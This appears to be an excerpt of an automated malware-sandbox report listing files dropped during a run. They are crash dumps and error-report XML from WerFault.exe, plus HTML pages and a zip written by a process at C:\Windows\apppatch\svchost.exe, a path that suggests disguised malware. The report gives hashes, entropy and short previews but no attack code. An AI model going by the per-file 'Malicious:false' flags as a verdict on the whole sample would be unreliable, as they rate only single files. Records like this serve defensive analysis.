                                                                                                                                                                                                              SHA-256:BBC3B263A4FF3ABCF880890E231B807E48A57780ED420D74EC6518767EC86E2D
                                                                                                                                                                                                              SHA-512:AA3ACA28467197F41EDA0D4799F681FA66199527F3187EA2A6569FAC4376E775FF9508B9A551651631EC2DD8CBDEB366CD6945DDDFB8E362E626B5280160B6FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:49 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):72456
                                                                                                                                                                                                              Entropy (8bit):1.9185039912406388
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FEkgVLcz0/oRgvabmHnHS2neztx1dvZQ:bg+zaoRrmnS2nKrv
                                                                                                                                                                                                              MD5:ED8CC81F7B1051A37AD5DC63F7D7F616
                                                                                                                                                                                                              SHA1:328BA03A130246C40A386CF575BC64412EECCF0E
                                                                                                                                                                                                              SHA-256:848990938D921C2FE0EF4B95AEA0A6E90050C80186F3D63048EA9913B70A524E
                                                                                                                                                                                                              SHA-512:396EA854EB3642AAC2754692341BFE4731E12051956DA442368BB77B31484E7A28966050CA6AF0194E308847B431BF778E080F23250FD0C00A3102733A162915
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.707966770665889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJXkk6b6YSYSU9A+gmfYfNprp89bVqsftnm:R6lXJ/6b6YdSU9A+gmfQ2VJfA
                                                                                                                                                                                                              MD5:255F95993C9B689451C3843B0F54FA17
                                                                                                                                                                                                              SHA1:F89C50672BE551C24F1DC71EAF38616529B35B9F
                                                                                                                                                                                                              SHA-256:0DE8117B22D1FC1A98710F32BBF69F23303BEB0E9C0C015E934A1B236D3389FA
                                                                                                                                                                                                              SHA-512:AF6BE94DC6449D77C0917A5C91668544E3A5A4A02B21405DBF950652D70DA1AD333BEC901D72C7901864C9E9E002E16089B463465DD8B0CE5041CB196C789A1D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>7212</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.528542831138928
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYLYm8M4JYwF4+q8ms9Np/4SMd:uIjfYI7QI7VfJsE9b4SMd
                                                                                                                                                                                                              MD5:78CFBAD0F0B1166992CD2129C5D8027E
                                                                                                                                                                                                              SHA1:9489B1A4C645E63B4387C075F125CA47CACD4623
                                                                                                                                                                                                              SHA-256:0075837F214D26843737D9EE1A6D281840A75BC7D18912FE4AC712C1394612B2
                                                                                                                                                                                                              SHA-512:10CAE24413216097CCE8B2E36173C7F44ECB58778DF58673126DDDEA35E08409E4B405AE17BDFA2F9576A786D87ED3A69E55DEAA9B8B44CE77DE141E297A37A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:51 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):95210
                                                                                                                                                                                                              Entropy (8bit):1.8201730124315505
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:77ajPpAZcziL/DqRhe6g4h4wxkJ/dbOsdTegKdDAEOQr33wkRa4GyMOn:APp3ziL/DqRhe6hr+ssBaDAE1w4Gy9n
                                                                                                                                                                                                              MD5:6406F53BAE0E86883D2F4EDE0B534C2D
                                                                                                                                                                                                              SHA1:B008C4F5FC3646A68D3B8EBF71E495EB48F21844
                                                                                                                                                                                                              SHA-256:30425580A1E1F03DE3E708862A5DDAE9CB3A6B4A65FCA5AED85EF01012814E1F
                                                                                                                                                                                                              SHA-512:36A01D8DB34C48D110A8E449BB5E001DC835FAD26B190DD8D6770E6C032D1BBE156A44E812A9D90AD498DCE1DAD4738B957401A228B1A709CA2D409A66C04372
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8368
                                                                                                                                                                                                              Entropy (8bit):3.7053111046100695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJAkR6lgYKe6YSaSUragmfYfNpru89b8psfS0m:R6lXJ3656YfSUragmfQX8CfQ
                                                                                                                                                                                                              MD5:FA67F68598F39BF93EA5DF5782157D40
                                                                                                                                                                                                              SHA1:B3D09A9EF78C39D614A859A755214FC22F61DA7D
                                                                                                                                                                                                              SHA-256:EC49FB3D750827E2FB5F73C378B77807A060758D9C3C827FAAFFAF10C6546093
                                                                                                                                                                                                              SHA-512:6B98AFFC6D776C605AEDB92B429EE28D47B3F2320E4DC0E8668736A345B4EB4D43BD8C8573FAB2B29A88E39695C61218E73D057BC15C351A750978CBAD12DB43
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>344</Pid
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.532726032548063
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYDYm8M4JYwF5I+q8mN1Np/4S2d:uIjfYI7QI7VHJ2l1b4S2d
                                                                                                                                                                                                              MD5:32F3CC11ADF6F50DDA90A0665EDF0B1A
                                                                                                                                                                                                              SHA1:D9E66DE1ECDB1C6E8FFF7867FDD6A0F0D0707DA2
                                                                                                                                                                                                              SHA-256:14C9B65A3696AC643D3425A85639EED4F7CC7846FDA3F45F1610A1E37A7E87BA
                                                                                                                                                                                                              SHA-512:24FE9E73CD45B29B273B06399FDA7BBBD3D1EBB82006C986D90BD4B7BB14C245C894CE0F05BDC8FB22E2FD6FE161C5576EE969688E3D45E4B08EEB36FC127443
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:53 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73760
                                                                                                                                                                                                              Entropy (8bit):1.8355113429724748
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QGBXXevXOX1gVPkNbOK8jnqS+rrm9uWe0r5J8kIQ/HGlzFBWlt8ut7:3QkgVsczj1++9uWZP8kIQ/mlzFI8u
                                                                                                                                                                                                              MD5:BE167A8155915BEA479296DC46E9A73C
                                                                                                                                                                                                              SHA1:FA9E620ED11C8770A0F8B08BCF913FBD463A0F9E
                                                                                                                                                                                                              SHA-256:95F4F99A9A433F52D6AD7105E9B611C59C18E9395AB336D13E1C02E9322074A2
                                                                                                                                                                                                              SHA-512:F5E0D7C31CF5A01BA708B239FDA01F2B312827F9310520E1CE002E0B427073C6BAD6D4F9BCFFA575BCB47F0FDF14C9A1F341C54367D23BD67707EEB3B5AE4A35
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.7091499215383186
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJxk36ON6YSrSU/9gmfYfNpru89buZsf0Kam:R6lXJK686YeSU/9gmfQXuyfL
                                                                                                                                                                                                              MD5:86FC051FA472D362EB83526CE0B87E49
                                                                                                                                                                                                              SHA1:C54B114A264F9A23F8CDFCF1CC1C4B95FB46D21F
                                                                                                                                                                                                              SHA-256:135165AFE2A5C4071C20D2BB824D131C77FF8E6B6FDCB3B1CB9E08005B87DD0F
                                                                                                                                                                                                              SHA-512:DC3EABB6B737C62235889173745C040148DB64637EF91C00FD75B6AE5CECEA7BD7B3D209E1E7980334FA3DA0BC4CCF4A94846ED6ED0FF074DB050C73386D404F
                                                                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3964</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.5307768226288525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYnYm8M4JYwFao+q8mUNp/4Sxd:uIjfYI7QI7V3J5sb4Sxd
                                                                                                                                                                                                              MD5:7B3CA6960E29CAD743514019E9406B11
                                                                                                                                                                                                              SHA1:3AF897B19141DD76538610D6172E8E9FE3C9AD58
                                                                                                                                                                                                              SHA-256:186D6201A7FA78CEC753BED8AF70B5F8C317984390E8A0D8FE7C43A1EFB7DBA4
                                                                                                                                                                                                              SHA-512:5C100DDFB1C8E5BDA42DC191FEC81B80B4B95D5E7E0797FC9B5E4C5A670AAE3CEF8DAB2357CF3F343B0C61868AD268F3CAC153F5938D98CC62D67CEA84865CAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):4.802925647778009
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                              MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                              SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                              SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                              SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43486
                                                                                                                                                                                                              Entropy (8bit):6.064404948716681
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:CiBtrifZVO7Wg3hIBYaDWY7JXFZmoO9moOmcmoOTmoOCmoOODHuQFSFiydiGPtY/:C8Cg3klFFZmx9mxmcmxTmxCmx6uI98Za
                                                                                                                                                                                                              MD5:93C50F946A8AC6AE74EE8BF5FCA4E1D6
                                                                                                                                                                                                              SHA1:15A76B5B2B6CC1B4D8CA1699D6842FB240323582
                                                                                                                                                                                                              SHA-256:7D4FAFDBFFAF9A8AA36D0626ACD6728209D297652FA12B7AD1A3035B13950B1A
                                                                                                                                                                                                              SHA-512:C1759FD8DE200B3B257C2C010E639831BB57FBA6721EAD9E8B370B5DDC1F01D3F231790736A624A46E075A78528B15EAEC5503B5B660A6E8F7F7D33AAFF0331C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):4.802925647778009
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                              MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                              SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                              SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                              SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):162
                                                                                                                                                                                                              Entropy (8bit):4.43530643106624
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                              MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                              SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                              SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                              SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):50085
                                                                                                                                                                                                              Entropy (8bit):7.843884566226058
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:JTraoBwizduh7f53DMy6TnCMdRSKDFoRtHmDyMEirfXmDr9HInVNlvTjXAnFhgAH:Yau7Bp6dSKpxDy5DRY/LjqO1g
                                                                                                                                                                                                              MD5:4FC204B720FF59B556D42E5A8C7A5D00
                                                                                                                                                                                                              SHA1:680C42C88DB5FB05CABBA22104CC1129B14136FE
                                                                                                                                                                                                              SHA-256:CA51FC2F92A7000EE4A3C51987337E23C17EDA4FF7230EDDB2422932E8F8FFA5
                                                                                                                                                                                                              SHA-512:81F11884DB8959931059C3C1295C67E1F1FCBA4EE7D48D01A97BC6ABF463562682D64C4AF30FEF7427C3391EA395AF2AF6222B369A20359FDC91D0DFE88502D2
                                                                                                                                                                                                              Malicious:false
